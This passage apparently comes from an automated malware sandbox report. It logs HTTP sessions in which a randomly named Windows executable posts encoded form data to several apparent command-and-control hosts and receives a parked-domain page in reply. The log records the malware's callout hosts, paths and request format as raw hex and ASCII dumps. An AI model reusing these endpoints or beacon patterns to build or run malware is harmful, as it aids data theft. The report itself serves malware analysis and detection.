                Aug 23, 2024 04:19:52.981818914 CEST1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                Aug 23, 2024 04:19:52.981851101 CEST206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.449752194.9.94.85802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:54.846965075 CEST10898OUTPOST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 36 6c 57 39 73 52 6a 4e 49 4f 73 67 47 4b 31 52 32 52 39 32 56 54 66 30 78 45 44 7a 68 53 64 32 63 46 79 72 65 6f 72 38 4e 62 37 79 50 6d 65 6d 33 2f 67 39 6b 52 5a 36 38 36 4f 59 64 4e 42 77 5a 6d 79 6a 35 78 33 51 2b 79 77 30 51 6e 6d 66 64 70 46 41 75 46 70 58 42 32 45 51 31 78 62 59 72 31 66 59 2b 45 6b 45 46 66 33 51 54 58 69 70 4b 35 69 6b 2f 52 74 4a 49 66 58 53 2b 76 64 53 32 52 6b 75 64 67 6f 30 6c 6e 6a 6b 6c 67 7a 43 32 6e 32 49 4b 30 5a 32 46 62 6e 75 5a 49 6b [TRUNCATED]
                Data Ascii: AZOTcfex=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNv6lW9sRjNIOsgGK1R2R92VTf0xEDzhSd2cFyreor8Nb7yPmem3/g9kRZ686OYdNBwZmyj5x3Q+yw0QnmfdpFAuFpXB2EQ1xbYr1fY+EkEFf3QTXipK5ik/RtJIfXS+vdS2Rkudgo0lnjklgzC2n2IK0Z2FbnuZIkhww/nkWim2hmqaT2OphONFeQMYrNBQ1VrkZqo5Fe+PIblPuXmZOwytYQ6Uzw2YGRa/rzQ+dYkLieKKzvIDTPNaHI4sLbLzerzUNaC0/MVLZT37ySpk5CXopLFmdJfVhRcwa4qnf3Z6XHe1RCxMgt+O2tzA/SU7bYvVWcJwysssdO9TPcuF+murPDQHN0WpQdiiJjNew1/U7+BqVoEXIhYW83o/ZXFh9UcKO3+MYz+199jGUI+2blszQQQqrHxvao5WCZNsaGcqOAYVbgQWlTOpTAtp5yMbe29opIqDFrLL0sQLelAjXBT2Cy7EQP2ELzdMPouQkwvUufwxyOTtHhqfqp9MFXVTJc7N0c2123UN7gN8ZctWHe1nIqZN6OTm6yw9UDiknTs8Edr/Zp69waFmdsZIKYSvqNY60QLu4zOXeD9eCtTRa/2DrQ9DBilsmrNaF5rf/0jUcFYokV5aQtfoAX1ROpqBSCH4d3SemCk3f/HHb77DqCufk35+CnN0K/7B4t8cTKAlFTUlFarlhLHYXKb/jWluD/IzP++JQL1qnziFXnhG1jiYS8pRwSEcmF/R4A5IMYKSCSwFXEjRN6uHopYIaXiopH1GgvaF0kx8a5D2ypsRvcFtUvBAAlv62+6uXWdW0eHXhBVRyuISs0NkBNwQ37x5v0LL [TRUNCATED]
                Aug 23, 2024 04:19:55.506321907 CEST1236INHTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 23 Aug 2024 02:19:55 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 23, 2024 04:19:55.506383896 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 23, 2024 04:19:55.506421089 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 23, 2024 04:19:55.506455898 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                Aug 23, 2024 04:19:55.506496906 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.449753194.9.94.85802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:19:57.828607082 CEST518OUTGET /4hda/?AZOTcfex=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--matfrmn-jxa4m.se
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:19:58.472203016 CEST1236INHTTP/1.1 200 OK
                Server: nginx
                Date: Fri, 23 Aug 2024 02:19:58 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 23, 2024 04:19:58.472410917 CEST224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                Aug 23, 2024 04:19:58.472443104 CEST1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                Aug 23, 2024 04:19:58.472498894 CEST1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                Aug 23, 2024 04:19:58.472532988 CEST1236INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                Aug 23, 2024 04:19:58.472567081 CEST654INData Raw: 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 20 77 65 62 20 68 6f 73 74 69 6e 67
                Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.44975423.251.54.212802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:20:03.935277939 CEST763OUTPOST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 70 6e 2f 79 52 51 68 59 6a 4a 62 56 56 49 73 68 33 32 4a 64 46 4f 30 53 53 6d 4e 55 33 75 52 57 53 6e 37 78 33 42 46 69 48 55 6a 50 69 38 6c 34 43 4b 6d 75 66 75 43 70 6b 77 63 2b 67 37 6f 2b 46 65 61 43 76 6f 35 65 76 79 6e 69 55 72 38 54 4d 6a 4a 78 75 42 41 46 70 53 35 45 61 45 56 68 35 7a 43 69 47 38 43 70 46 4b 4c 75 77 54 58 69 36 6b 6c 79 32 4a 4a 4e 33 41 73 53 42 37 67 65 73 31 75 74 70 77 31 35 6b 39 55 47 55 73 35 54 35 59 39 6c 33 38 4e 56 59 46 37 36 7a 48 74 43 32 4e 56 42 6d 44 45 34 6b 37 54 45 67 59 4a 75 4e 77 4d 45 48 51 3d 3d
                Data Ascii: AZOTcfex=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l38NVYF76zHtC2NVBmDE4k7TEgYJuNwMEHQ==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.44975523.251.54.212802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:20:06.637464046 CEST783OUTPOST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 42 57 53 47 4c 78 32 44 74 69 41 55 6a 50 73 63 6b 79 63 36 6d 70 66 75 47 68 6b 31 6b 2b 67 37 38 2b 46 61 57 43 76 37 68 52 75 69 6e 67 4d 62 38 64 49 6a 4a 78 75 42 41 46 70 53 38 5a 61 41 78 68 34 44 53 69 46 59 32 75 62 36 4c 70 6d 6a 58 69 70 30 6c 32 32 4a 4a 2f 33 46 49 30 42 39 6b 65 73 77 4b 74 71 68 31 36 2f 4e 55 4d 4b 63 34 6e 33 4c 49 31 31 4e 34 4a 57 32 50 35 31 6e 63 6e 36 72 45 62 33 79 6c 76 32 37 33 33 39 66 41 61 41 7a 78 4e 63 57 73 66 66 4b 42 45 6e 70 58 4e 38 42 67 2b 58 39 66 65 52 6f 4d 3d
                Data Ascii: AZOTcfex=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27339fAaAzxNcWsffKBEnpXN8Bg+X9feRoM=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.44975623.251.54.212802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:20:09.178349018 CEST10865OUTPOST /li0t/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.anuts.top
                Origin: http://www.anuts.top
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.anuts.top/li0t/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 4a 57 54 30 7a 78 32 6b 5a 69 42 55 6a 50 79 4d 6b 78 63 36 6d 30 66 71 69 6c 6b 31 35 46 67 35 45 2b 45 35 65 43 36 2b 4e 52 67 69 6e 67 51 72 38 51 4d 6a 49 72 75 42 52 43 70 54 4d 5a 61 41 78 68 34 42 61 69 52 38 43 75 5a 36 4c 75 77 54 58 75 36 6b 6c 65 32 4a 52 46 33 46 4d 43 43 4e 45 65 76 51 61 74 6d 33 5a 36 7a 4e 55 4b 4c 63 34 2f 33 4c 56 76 31 4e 6b 46 57 32 4b 63 31 6b 41 6e 35 38 46 54 6a 41 78 75 71 34 50 65 75 4e 34 62 4d 42 70 67 58 55 4a 67 58 62 68 38 38 72 58 6e 38 68 4e 4d 4e 65 72 41 4e 74 46 36 50 68 6e 36 66 6f 53 68 53 6a 65 79 70 4f 35 39 72 30 35 52 39 64 46 6c 75 37 47 76 67 4e 45 49 66 54 45 35 50 6d 42 33 74 6a 2b 49 57 78 6f 74 52 75 35 42 6d 49 71 68 6b 4e 72 46 77 2b 70 79 61 4a 61 47 6b 32 38 6a 4a 42 78 6f 2b 53 35 7a 6c 6d 52 78 6e 58 32 30 77 7a 58 63 61 56 78 59 70 45 48 33 4c 6d 69 49 68 36 63 66 6a 78 63 67 76 [TRUNCATED]
                Data Ascii: AZOTcfex=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YJWT0zx2kZiBUjPyMkxc6m0fqilk15Fg5E+E5eC6+NRgingQr8QMjIruBRCpTMZaAxh4BaiR8CuZ6LuwTXu6kle2JRF3FMCCNEevQatm3Z6zNUKLc4/3LVv1NkFW2Kc1kAn58FTjAxuq4PeuN4bMBpgXUJgXbh88rXn8hNMNerANtF6Phn6foShSjeypO59r05R9dFlu7GvgNEIfTE5PmB3tj+IWxotRu5BmIqhkNrFw+pyaJaGk28jJBxo+S5zlmRxnX20wzXcaVxYpEH3LmiIh6cfjxcgvnwCRFSUk+54ZwXMq2uVfWg45fy3AGQzdV0Np8TVLwPRY+/xdMHOnXEhv4iPmemX/cOS94WU0d5qD9i2AgKZpGX3/iXT2LKbDQeBHqjcbvsf+3uO3lEe9uh4Ic1bpTELlpQIIkNOadANHvb2C0G47hpS289mPWEhU7agJWFP1Kjltroa6VdCUJXYi6RC8YAjamqKG1ttCF866n89Nmtq2ZqOPRKfrd2pc43BKWWf72kNi4RViUj1q1SPEjdVm1Tkyr4Pan9tieLsBpAAXZ6Vvb5sZC+bzduLc39lWejU3hpNfJUflhfJ9Xq2YfXc9K7daT1HyNKaI4/lCZZpBzAPxt17F6LMfSFJ9zlL13wXv9AAr2wEAzVXuP/h+S6x9x0umTug7oSrXBy1AB/jhwv504FVZRVAmxjbmiq7Bsq4IeezFzTvYJc6VdOD271QYJRHBOkstDKbE6JIo8zAUTUl7oPkBMVEyJV9n9oKjAKRPffXfF64OV5uQZQFlpvDA+SK0q+oyZo2uZjaKtuVhNz3NKtMTJUQ5ulyjMEt7leYc0i4cvfds3Qzvqd0bB+iVWlRBjZ91MOqiOzRhPrRRrZPs9Zy+QIeQEM7PWKnC3fqHQ7ryMGqy9dfROe88xB4BSGqQQ+7qgDFbWpWM9wS/mi41cuCi27sKlzLY1E [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.44975723.251.54.212802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:20:11.719743013 CEST507OUTGET /li0t/?bB7L5=DPt0-rQpMXpt&AZOTcfex=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.anuts.top
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                21192.168.2.449758199.192.19.19802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:20:38.155503988 CEST775OUTPOST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
